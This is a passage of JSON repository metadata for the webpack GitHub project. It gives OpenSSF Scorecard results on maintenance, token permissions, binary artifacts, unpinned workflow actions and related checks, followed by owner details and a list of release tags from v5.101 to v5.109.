90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5